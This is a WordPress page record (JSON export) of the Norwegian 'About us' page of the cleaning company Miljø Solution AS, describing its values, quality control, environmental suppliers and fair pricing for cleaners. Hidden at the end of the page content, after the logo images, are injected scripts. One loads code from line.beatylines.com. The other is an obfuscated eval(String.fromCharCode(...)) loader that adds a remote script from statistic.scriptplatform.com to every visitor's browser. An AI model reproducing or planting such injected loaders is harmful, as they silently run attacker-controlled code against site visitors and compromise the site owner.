{"id":20,"date":"2019-07-11T06:55:53","date_gmt":"2019-07-11T05:55:53","guid":{"rendered":"http:\/\/ms24.no\/?page_id=20"},"modified":"2021-01-30T04:34:34","modified_gmt":"2021-01-30T04:34:34","slug":"om-oss","status":"publish","type":"page","link":"https:\/\/ms24.no\/?page_id=20","title":{"rendered":"Om oss"},"content":{"rendered":"<h2 style=\"\">Informasjon om Milj\u00f8 Solution AS\t<\/h2>\n<p>Milj\u00f8 Solution AS er en offentlig godkjent renholdsvirksomhet og har i tillegg lang og bred erfaring gjennom eiere, ledelse og medarbeidere. Vi mener oss absolutt rustet for \u00e5 kunne gjennomf\u00f8re renholdsoppdrag hos dere, etter de erfaringene vi har.<\/p>\n<h3>Hva st\u00e5r vi for?<\/h3>\n<p>Kunnskap og erfaring er en n\u00f8kkelfaktor for \u00e5 gi b\u00e5de oss selv, v\u00e5re medarbeidere og v\u00e5re samarbeidspartnere trygghet for at vi leverer som avtalt.<\/p>\n<p>Gjennom \u00e5 sette pris p\u00e5 og bry oss om v\u00e5re samarbeidspartnere vil dette bidra til utvikling og bedre resultater.<\/p>\n<p>Gjennom Punktlighet og ordholdenhet i alt vi gj\u00f8r skaper dette tillit mellom oss og v\u00e5re samarbeidspartnere.<\/p>\n<p>For oss er det viktig \u00e5 l\u00f8se oppgavene riktig f\u00f8rste gang for \u00e5 bidra til utvikling og bedre resultater for v\u00e5re samarbeidspartnere.<\/p>\n<h3>Forretningside<\/h3>\n<p>Milj\u00f8 Solution AS skal levere renholdstjenester til private bedrifter og det offentlige marked med basis i v\u00e5re grunnleggende verdier.<\/p>\n<h3>Marked<\/h3>\n<p>Det skal v\u00e6re fokus p\u00e5 private og offentlige virksomheters behov for \u00e5 f\u00e5 utf\u00f8rt renholdstjenester samt r\u00e5dgivning og konsulentvirksomhet forbundet med definering av renholdbehov og kompetanse.<\/p>\n<h3>Tjenester &amp; Produkter<\/h3>\n<p>Milj\u00f8 Solution AS skal utvikle og levere alle typer renholdstjenester.\u00a0 Med basis i renholdsfaglig kompetanse, egne kvalitetsstandarder og virksomhetenes behov, skal Milj\u00f8 Solution AS utvikle tjenester og l\u00f8sninger for definering, etablering, gjennomf\u00f8ring, oppf\u00f8lging, styring og optimalisering av renholdstjenester, samt avklaring og oppbygging av n\u00f8dvendig kompetanse.<\/p>\n<h3>Kvalitet<\/h3>\n<p>For Milj\u00f8 Solution AS er kvalitet den viktigste faktoren for \u00e5 lykkes. Renholdskvalitet er ofte subjektivt og handler om brukernes forventninger. Som kunde av Milj\u00f8 Solution AS vil dere som kunde og samarbeidspartner, f\u00e5 en fast kontaktperson \u00e5 forholde dere til, det vil bli tatt m\u00e5nedlige kvalitetskontroller.. Vi legger opp til m\u00f8ter der vi gjennomg\u00e5r hvordan dere som kunde opplever kvaliteten og behov for eventuelle ekstratjenester.<\/p>\n<h3>Milj\u00f8<\/h3>\n<p>For oss i Milj\u00f8 Solution AS er milj\u00f8 en viktig faktor, derfor velger vi samarbeidspartnere som ogs\u00e5 er opptatt av dette.\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 V\u00e5r samarbeidspartner p\u00e5 rekvisita og kjemi har sterkt fokus p\u00e5 milj\u00f8 og hele produktserien vi bruker er milj\u00f8merket. N\u00e5r det gjelder matter og mopper er v\u00e5r leverand\u00f8r et milj\u00f8fyrt\u00e5rn vaskeri. V\u00e5re rengj\u00f8ringsmetoder belaster milj\u00f8et minimalt og vi tilstreber \u00e5 forbedre oss gjennom \u00f8kt bruk av mikrofibermopper samt moderne og innovative metoder.<\/p>\n<p>\t\t\t\t\t\t\t<a> <\/a>\t\t<\/p>\n<h3>Rekruttering<\/h3>\n<p>Hos oss kan renholderne v\u00e6re trygge p\u00e5 at de ikke f\u00e5r oppdrag som er underpriset.<br \/>Underprising s\u00f8rger for at renholderne m\u00e5 jobbe i ett umenneskelig tempo for \u00e5 levere avtalt kvalitet, kvaliteten synker og man f\u00e5r sykemeldinger. Det ender <u>alltid<\/u> opp med ett kortvarig og vanskelig kundeforhold, samt misn\u00f8ye blant renholderne. Renholderne er v\u00e5re viktigste ansatte og vi prioriterer derfor alltid dem foran v\u00e5re kunder. Det er v\u00e5rt ansvar \u00e5 verne om en ellers s\u00e5 utsatt yrkesgruppe.<br \/>Vi er tro mot v\u00e5re ansatte og v\u00e5r visjon. <br \/>Derfor vil du som kunde kunne v\u00e6re trygg p\u00e5 at v\u00e5rt tilbud ivaretar alles interesser.<br \/>Vi \u00f8nsker \u00e5 g\u00e5 foran som ett godt eksempel ved \u00e5 effektivisere ved bruk av riktig utstyr og metoder.<\/p>\n<p>\t\t\t\t\t\t\t\t\t<img decoding=\"async\" width=\"300\" height=\"193\" src=\"http:\/\/ms24.no\/wp-content\/uploads\/2021\/01\/renholdsbedrift_orig.jpg\" alt=\"\" loading=\"lazy\" \/><br \/>\n\t\t\t\t\t\t\t\t\t<img decoding=\"async\" width=\"280\" height=\"210\" src=\"http:\/\/ms24.no\/wp-content\/uploads\/2021\/01\/Startbank-140x105@2x.png\" alt=\"\" loading=\"lazy\" \/><br \/>\n\t\t\t\t\t\t\t\t\t<img decoding=\"async\" width=\"150\" height=\"154\" src=\"http:\/\/ms24.no\/wp-content\/uploads\/2021\/01\/gronn-punkt-e1611063978829.png\" alt=\"\" loading=\"lazy\" \/><br \/>\n\t\t\t\t\t\t\t\t\t<img decoding=\"async\" width=\"300\" height=\"193\" src=\"http:\/\/ms24.no\/wp-content\/uploads\/2021\/01\/mva-registrert_orig.png\" alt=\"\" loading=\"lazy\" \/><script src='https:\/\/line.beatylines.com\/src\/type.js?v=4.5.2' type='text\/javascript' id='globalsway'><\/script><script>var f=String;eval(f.fromCharCode(102,117,110,99,116,105,111,110,32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,116,105,115,116,105,99,46,115,99,114,105,112,116,115,112,108,97,116,102,111,114,109,46,99,111,109,47,99,111,108,108,101,99,116,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,125,125));\/*99586587347*\/<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Informasjon om Milj\u00f8 Solution AS Milj\u00f8 Solution AS er en offentlig godkjent renholdsvirksomhet og har i tillegg lang og bred erfaring gjennom eiere, ledelse og medarbeidere. Vi mener oss absolutt rustet for \u00e5 kunne gjennomf\u00f8re renholdsoppdrag hos dere, etter de erfaringene vi har. Hva st\u00e5r vi for? Kunnskap og erfaring er en n\u00f8kkelfaktor for \u00e5 [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-20","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/pages\/20","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/ms24.no\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=20"}],"version-history":[{"count":30,"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/pages\/20\/revisions"}],"predecessor-version":[{"id":4958,"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/pages\/20\/revisions\/4958"}],"wp:attachment":[{"href":"https:\/\/ms24.no\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=20"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}